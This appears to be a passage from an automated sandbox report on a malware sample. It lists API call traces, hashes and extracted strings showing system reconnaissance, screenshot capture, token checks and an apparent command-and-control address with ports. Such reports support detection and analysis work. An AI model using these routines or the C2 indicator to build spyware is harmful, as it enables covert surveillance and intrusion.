                                                                                                                            • Instruction Fuzzy Hash: 10D01236704165230B2CA06F78215BBA6DF87C5661319C03AF508D7704DC52CC0206E7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 18b410a2a315abe0d33159c3c231c9fbc7a0dc3d98fd57c3321b1479e854e4c1
                                                                                                                            • Instruction ID: 71d06de57fd367fd9b62c8647d5012e26ad1ffaff0acc5f2b80869d52f598122
                                                                                                                            • Opcode Fuzzy Hash: 18b410a2a315abe0d33159c3c231c9fbc7a0dc3d98fd57c3321b1479e854e4c1
                                                                                                                            • Instruction Fuzzy Hash: 50C01217B1E2A85BC71F56427C408F57B28DD872B1B010093DB17CAC0141110B3452F2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1723364077.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_70a0000_powershell.jbxd
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: q^$q^$q^$q^
                                                                                                                            • API String ID: 0-1645595170
                                                                                                                            • Opcode ID: 88f5ac513b270bdcba8ce6f7e57d39a7cff0a66573299ae1b5fc832843e19d89
                                                                                                                            • Instruction ID: 36405c8f290fca8ff8383aa370b49cbec228907e95881be32a898ba7b8387018
                                                                                                                            • Opcode Fuzzy Hash: 88f5ac513b270bdcba8ce6f7e57d39a7cff0a66573299ae1b5fc832843e19d89
                                                                                                                            • Instruction Fuzzy Hash: EE317B1250E3E11FD30BAB3D98B45917FB1AE57268B1A44DBC0C5CF0A3D818599ED3AB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1723364077.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_70a0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                                            • API String ID: 0-2125118731
                                                                                                                            • Opcode ID: de9fadbb5b74beebe3b5a19a3b46bb6cfe9f0786056621ca261f898515e3a0b5
                                                                                                                            • Instruction ID: 2107df04f73286083d328739f3bc71501ff4160a63dde83dc455de8727712d0e
                                                                                                                            • Opcode Fuzzy Hash: de9fadbb5b74beebe3b5a19a3b46bb6cfe9f0786056621ca261f898515e3a0b5
                                                                                                                            • Instruction Fuzzy Hash: 12214971700356ABDB7855BA9C00B2FB7D67BC0711F24852AE506EB385DD36C8548761
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1723364077.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_70a0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                            • API String ID: 0-2049395529
                                                                                                                            • Opcode ID: cac650d889536bd66b70a5c92ce9bb7b2e7e4065983e20ad0508afd0010a2b2c
                                                                                                                            • Instruction ID: 5fe5cc9458f9ae8487ca73f8fd2b490d90a254f2ee1b5e5fff5b675eb946652e
                                                                                                                            • Opcode Fuzzy Hash: cac650d889536bd66b70a5c92ce9bb7b2e7e4065983e20ad0508afd0010a2b2c
                                                                                                                            • Instruction Fuzzy Hash: 5001A261B0D39A5FC76B12B818201556FF65FC3940B2A86D7C181CF3ABEE158D4E83A7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1723364077.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_70a0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $^q$$^q$J8l$J8l
                                                                                                                            • API String ID: 0-1806373838
                                                                                                                            • Opcode ID: ae0702d1f9ced9a33c5d88fbc35b805780c7a58ee8abbc847b790a6b7321b9cb
                                                                                                                            • Instruction ID: aa573a7b47bdb73c2d2681935720a882f0c53fe2ef903f741bc2dd1d870e4b10
                                                                                                                            • Opcode Fuzzy Hash: ae0702d1f9ced9a33c5d88fbc35b805780c7a58ee8abbc847b790a6b7321b9cb
                                                                                                                            • Instruction Fuzzy Hash: 7101D47660E3855FC32742685C20456BFB66FD3A10F1A46E7C280DF36BCA298C09C762

Execution Graph

Execution Coverage:5.3%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:0.3%
Total number of Nodes:604
Total number of Limit Nodes:20

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0362F707: _malloc.LIBCMT ref: 0362F721
                                                                                                                            • _memset.LIBCMT ref: 0362546C
                                                                                                                            • _memset.LIBCMT ref: 03625485
                                                                                                                            • _memset.LIBCMT ref: 03625495
                                                                                                                            • gethostname.WS2_32(?,00000032), ref: 036254A3
                                                                                                                            • gethostbyname.WS2_32(?), ref: 036254AD
                                                                                                                            • inet_ntoa.WS2_32 ref: 036254C5
                                                                                                                            • _strcat_s.LIBCMT ref: 036254D8
                                                                                                                            • _strcat_s.LIBCMT ref: 036254F1
                                                                                                                            • inet_ntoa.WS2_32 ref: 0362551A
                                                                                                                            • _strcat_s.LIBCMT ref: 0362552D
                                                                                                                            • _strcat_s.LIBCMT ref: 03625546
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03625573
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03625587
                                                                                                                            • GetLastInputInfo.USER32(?), ref: 0362559A
                                                                                                                            • GetTickCount.KERNEL32 ref: 036255A0
                                                                                                                            • wsprintfW.USER32 ref: 036255D5
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 036255E8
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000296,00000000), ref: 036255FC
                                                                                                                            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03625653
                                                                                                                            • wsprintfW.USER32 ref: 0362566C
                                                                                                                            • GetForegroundWindow.USER32 ref: 03625695
                                                                                                                            • GetWindowTextW.USER32(00000000,000006CE,000000FA), ref: 036256AC
                                                                                                                            • lstrlenW.KERNEL32(000008CC), ref: 036256D3
                                                                                                                            • lstrlenW.KERNEL32(00000994), ref: 03625739
                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 036257AA
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 036257B1
                                                                                                                            • GetNativeSystemInfo.KERNEL32(?), ref: 036257C2
                                                                                                                            • GetSystemInfo.KERNEL32(?), ref: 036257CD
                                                                                                                            • wsprintfW.USER32 ref: 03625806
                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 03625818
                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 0362582E
                                                                                                                            • K32GetProcessImageFileNameW.KERNEL32(00000000,?,00000104), ref: 0362584B
                                                                                                                            • CloseHandle.KERNEL32(03645164), ref: 0362587F
                                                                                                                            • GetTickCount.KERNEL32 ref: 036258E9
                                                                                                                            • __time64.LIBCMT ref: 036258F8
                                                                                                                            • __localtime64.LIBCMT ref: 0362592F
                                                                                                                            • wsprintfW.USER32 ref: 03625968
                                                                                                                            • GetLocaleInfoW.KERNEL32(00000800,00000002,00000F46,00000040), ref: 0362597D
                                                                                                                            • GetSystemDirectoryW.KERNEL32(00001184,00000032), ref: 0362598C
                                                                                                                            • GetCurrentHwProfileW.ADVAPI32(?), ref: 03625999
                                                                                                                              • Part of subcall function 036280F0: GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 03628132
                                                                                                                              • Part of subcall function 036280F0: lstrcmpiW.KERNEL32(?,A:\), ref: 03628166
                                                                                                                              • Part of subcall function 036280F0: lstrcmpiW.KERNEL32(?,B:\), ref: 03628176
                                                                                                                              • Part of subcall function 036280F0: QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 036281A6
                                                                                                                              • Part of subcall function 036280F0: lstrlenW.KERNEL32(?), ref: 036281B7
                                                                                                                              • Part of subcall function 036280F0: __wcsnicmp.LIBCMT ref: 036281CE
                                                                                                                              • Part of subcall function 036280F0: lstrcpyW.KERNEL32(00000AD4,?), ref: 03628204
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Info$ByteCharMultiSystemWide_strcat_swsprintf$Process_memsetlstrlen$CountCurrentHandleTickWindowinet_ntoalstrcmpi$AddressCloseDeviceDirectoryDriveFileForegroundImageInputLastLocaleLogicalModuleNameNativeOpenProcProfileQueryStringsText__localtime64__time64__wcsnicmp_mallocgethostbynamegethostnamelstrcpy
                                                                                                                            • String ID: %d min$1.0$2024.12. 3$AppEvents$GROUP$GetNativeSystemInfo$Network$REMARK$X86$X86 %s$kernel32.dll$x64$x86
                                                                                                                            • API String ID: 1101047656-1568689114
                                                                                                                            • Opcode ID: 7635fdc19f1a50b5280a78092be706a34309ba5766c0561e16fa8c0ad9e3e46f
                                                                                                                            • Instruction ID: ef2d809689ecf8016e70a15f407389073858748c3d5c02a402e02fbe4485f5ec
                                                                                                                            • Opcode Fuzzy Hash: 7635fdc19f1a50b5280a78092be706a34309ba5766c0561e16fa8c0ad9e3e46f
                                                                                                                            • Instruction Fuzzy Hash: F2F1E3B5A40714AFD724EB64CC85FEBBBB8AB45700F00455CF70AAB285EB70AA44CF55
                                                                                                                            APIs
                                                                                                                            • GetNativeSystemInfo.KERNEL32(?), ref: 028804AE
                                                                                                                            • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 028804DE
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 028804F5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135368981.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2880000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual$InfoNativeSystem
                                                                                                                            • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                                                                                                            • API String ID: 4117132724-2899676511
                                                                                                                            • Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                                            • Instruction ID: 8e6e1f8afc06ee510e5b2dbba922f1dd1134104d7621abea32ec05a6ecd2e281
                                                                                                                            • Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                                            • Instruction Fuzzy Hash: E1628B7A5083858FD730DF24C840BABBBE4FF94704F04482DE9C99B252E7749988CB56

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 03630542: __fassign.LIBCMT ref: 03630538
                                                                                                                            • Sleep.KERNEL32(00000000), ref: 0362DF64
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0362DF91
                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 0362DFA9
                                                                                                                            • wsprintfW.USER32 ref: 0362DFE0
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(036275B0), ref: 0362DFEE
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0362E007
                                                                                                                              • Part of subcall function 0362F707: _malloc.LIBCMT ref: 0362F721
                                                                                                                            • EnumWindows.USER32(03625CC0,?), ref: 0362E19D
                                                                                                                            • Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0362E1AA
                                                                                                                            • EnumWindows.USER32(03625CC0,?), ref: 0362E1BE
                                                                                                                            • Sleep.KERNEL32(00000BB8), ref: 0362E1F5
                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0362E241
                                                                                                                            • Sleep.KERNEL32(00000FA0), ref: 0362E2C4
                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 0362E2EB
                                                                                                                            • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0362E30B
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0362E35D
                                                                                                                            • Sleep.KERNEL32(000003E8,?,?), ref: 0362E3A4
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0362E3D0
                                                                                                                            • CloseHandle.KERNEL32(?,?,?), ref: 0362E3D7
                                                                                                                            • Sleep.KERNEL32(000003E8,?,?), ref: 0362E3E2
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0362E400
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0362E425
                                                                                                                            • CloseHandle.KERNEL32(?,?,?), ref: 0362E42C
                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?), ref: 0362E446
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0362E464
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleSleep$EnumObjectSingleWaitWindows$CreateEventExceptionFilterLocalOpenQueryTimeUnhandledValue__fassign_mallocwsprintf
                                                                                                                            • String ID: %4d.%2d.%2d-%2d:%2d:%2d$118.107.44.219$118.107.44.219$118.107.44.219$118.107.44.219$19091$19091$19092$19093$Console$IpDatespecial
                                                                                                                            • API String ID: 1511462596-472669843
                                                                                                                            • Opcode ID: 39d63efae47da3de42787a95c0fafa18efc90efd1058afccc07eb63a79ee1621
                                                                                                                            • Instruction ID: a439e76f8b4c8d446b3376e9a668d9037a12beb2a98dfd227af75df8090084e6
                                                                                                                            • Opcode Fuzzy Hash: 39d63efae47da3de42787a95c0fafa18efc90efd1058afccc07eb63a79ee1621
                                                                                                                            • Instruction Fuzzy Hash: 7AD1F4B4A44710AFD320EF60DC45E2BBFB8BB85700F115A2CF5658A289DB729445CF6B

                                                                                                                            APIs
                                                                                                                            • GetDesktopWindow.USER32 ref: 0362BC8F
                                                                                                                            • GetDC.USER32(00000000), ref: 0362BC9C
                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0362BCA2
                                                                                                                            • GetDC.USER32(00000000), ref: 0362BCAD
                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 0362BCBA
                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000076), ref: 0362BCC2
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0362BCD3
                                                                                                                            • GetSystemMetrics.USER32(0000004E), ref: 0362BCF8
                                                                                                                            • GetSystemMetrics.USER32(0000004F), ref: 0362BD26
                                                                                                                            • GetSystemMetrics.USER32(0000004C), ref: 0362BD78
                                                                                                                            • GetSystemMetrics.USER32(0000004D), ref: 0362BD8D
                                                                                                                            • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 0362BDA6
                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0362BDB4
                                                                                                                            • SetStretchBltMode.GDI32(?,00000003), ref: 0362BDC0
                                                                                                                            • GetSystemMetrics.USER32(0000004F), ref: 0362BDCD
                                                                                                                            • GetSystemMetrics.USER32(0000004E), ref: 0362BDE0
                                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,00000000), ref: 0362BE07
                                                                                                                            • _memset.LIBCMT ref: 0362BE7A
                                                                                                                            • GetDIBits.GDI32(?,?,00000000,00000000,?,00000028,00000000), ref: 0362BE97
                                                                                                                            • _memset.LIBCMT ref: 0362BEAF
                                                                                                                              • Part of subcall function 0362F707: _malloc.LIBCMT ref: 0362F721
                                                                                                                            • DeleteObject.GDI32(?), ref: 0362BF23
                                                                                                                            • DeleteObject.GDI32(?), ref: 0362BF2D
                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 0362BF39
                                                                                                                            • DeleteObject.GDI32(?), ref: 0362BFDF
                                                                                                                            • DeleteObject.GDI32(?), ref: 0362BFE9
                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 0362BFF5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch_memset$BitmapBitsDesktopModeSelectWindow_malloc
                                                                                                                            • String ID: ($6$gfff$gfff

                                                                                                                            APIs
                                                                                                                            • GetCurrentProcessId.KERNEL32(75BF73E0), ref: 03626A94
                                                                                                                            • wsprintfW.USER32 ref: 03626AA7
                                                                                                                              • Part of subcall function 03626910: GetCurrentProcessId.KERNEL32(95401134,00000000,00000000,75BF73E0,?,00000000,036410DB,000000FF,?,03626AB3,00000000), ref: 03626938
                                                                                                                              • Part of subcall function 03626910: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,036410DB,000000FF,?,03626AB3,00000000), ref: 03626947
                                                                                                                              • Part of subcall function 03626910: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,036410DB,000000FF,?,03626AB3,00000000), ref: 03626960
                                                                                                                              • Part of subcall function 03626910: CloseHandle.KERNEL32(00000000,?,00000000,036410DB,000000FF,?,03626AB3,00000000), ref: 0362696B
                                                                                                                            • _memset.LIBCMT ref: 03626AC2
                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 03626ADB
                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?), ref: 03626B12
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 03626B19
                                                                                                                            • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 03626B3F
                                                                                                                            • GetLastError.KERNEL32 ref: 03626B49
                                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 03626B5D
                                                                                                                            • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 03626B85
                                                                                                                            • GetSidSubAuthorityCount.ADVAPI32 ref: 03626B98
                                                                                                                            • GetSidSubAuthority.ADVAPI32(00000000), ref: 03626BA6
                                                                                                                            • LocalFree.KERNEL32(?), ref: 03626BB5
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 03626BC2
                                                                                                                            • wsprintfW.USER32 ref: 03626C1B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion_memset
                                                                                                                            • String ID: -N/$NO/$None/%s

                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(ntdll.dll,75BF73E0,?,?,?,03625611,0000035E,000002FA), ref: 0362749C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 036274B2
                                                                                                                            • swprintf.LIBCMT ref: 036274EF
                                                                                                                              • Part of subcall function 03627410: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03627523), ref: 0362743D
                                                                                                                              • Part of subcall function 03627410: GetProcAddress.KERNEL32(00000000), ref: 03627444
                                                                                                                              • Part of subcall function 03627410: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03627523), ref: 03627452
                                                                                                                            • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,000002FA), ref: 03627547
                                                                                                                            • RegQueryValueExW.KERNEL32(000002FA,ProductName,00000000,00000001,00000000,?), ref: 03627563
                                                                                                                            • RegCloseKey.KERNEL32(000002FA), ref: 03627586
                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,03625611,0000035E,000002FA), ref: 03627598
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValueswprintf
                                                                                                                            • String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                                                                                                                            APIs
                                                                                                                            • GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 03628132
                                                                                                                            • lstrcmpiW.KERNEL32(?,A:\), ref: 03628166
                                                                                                                            • lstrcmpiW.KERNEL32(?,B:\), ref: 03628176
                                                                                                                            • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 036281A6
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 036281B7
                                                                                                                            • __wcsnicmp.LIBCMT ref: 036281CE
                                                                                                                            • lstrcpyW.KERNEL32(00000AD4,?), ref: 03628204
                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 03628228
                                                                                                                            • lstrcatW.KERNEL32(?,00000000), ref: 03628233
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
                                                                                                                            • String ID: A:\$B:\
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 03625320: InterlockedDecrement.KERNEL32(00000008), ref: 0362536F
                                                                                                                              • Part of subcall function 03625320: SysFreeString.OLEAUT32(00000000), ref: 03625384
                                                                                                                              • Part of subcall function 03625320: SysAllocString.OLEAUT32(03645148), ref: 036253D5
                                                                                                                            • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,?,03645148,036269A4,03645148,00000000,75BF73E0), ref: 036267F4
                                                                                                                            • GetLastError.KERNEL32 ref: 036267FE
                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 03626816
                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0362681D
                                                                                                                            • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,?,?), ref: 0362683F
                                                                                                                            • LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 03626871
                                                                                                                            • GetLastError.KERNEL32 ref: 0362687B
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 036268E6
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 036268ED
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountDecrementInterlockedLookup
                                                                                                                            • String ID: NONE_MAPPED
                                                                                                                            APIs
                                                                                                                            • GetDriveTypeW.KERNEL32(?,74DEDF80,00000000,75BF73E0), ref: 03626C8B
                                                                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 03626CAA
                                                                                                                            • _memset.LIBCMT ref: 03626CE1
                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 03626CF4
                                                                                                                            • swprintf.LIBCMT ref: 03626D39
                                                                                                                            • swprintf.LIBCMT ref: 03626D4C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: swprintf$DiskDriveFreeGlobalMemorySpaceStatusType_memset
                                                                                                                            • String ID: %sFree%d Gb $:$@$HDD:%d
                                                                                                                            APIs
                                                                                                                            • CreateDXGIFactory.DXGI(0364579C,?,95401134,74DEDF80,00000000,75BF73E0), ref: 03626F4A
                                                                                                                            • swprintf.LIBCMT ref: 0362711E
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 036271C7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFactoryXinvalid_argumentstd::_swprintf
                                                                                                                            • String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
                                                                                                                            • API String ID: 3803070356-257307503
                                                                                                                            • Opcode ID: b9cf20ef2b13be8fce20acd64a475607e4ba5e91536bcfcf8593cbfce4d730bf
                                                                                                                            • Instruction ID: ff0aaeae1ce42e302bc1590c69354776f6c2dc51b945e39d031f28e5a5affbb2
                                                                                                                            • Opcode Fuzzy Hash: b9cf20ef2b13be8fce20acd64a475607e4ba5e91536bcfcf8593cbfce4d730bf
                                                                                                                            • Instruction Fuzzy Hash: 7AE16171E016359FDF24CE64CD80FEEB775AB89700F1942E9D90AA7385D670AE818F90

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,00020019,?), ref: 02C35507
                                                                                                                            • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 02C3552E
                                                                                                                            • _memset.LIBCMT ref: 02C35548
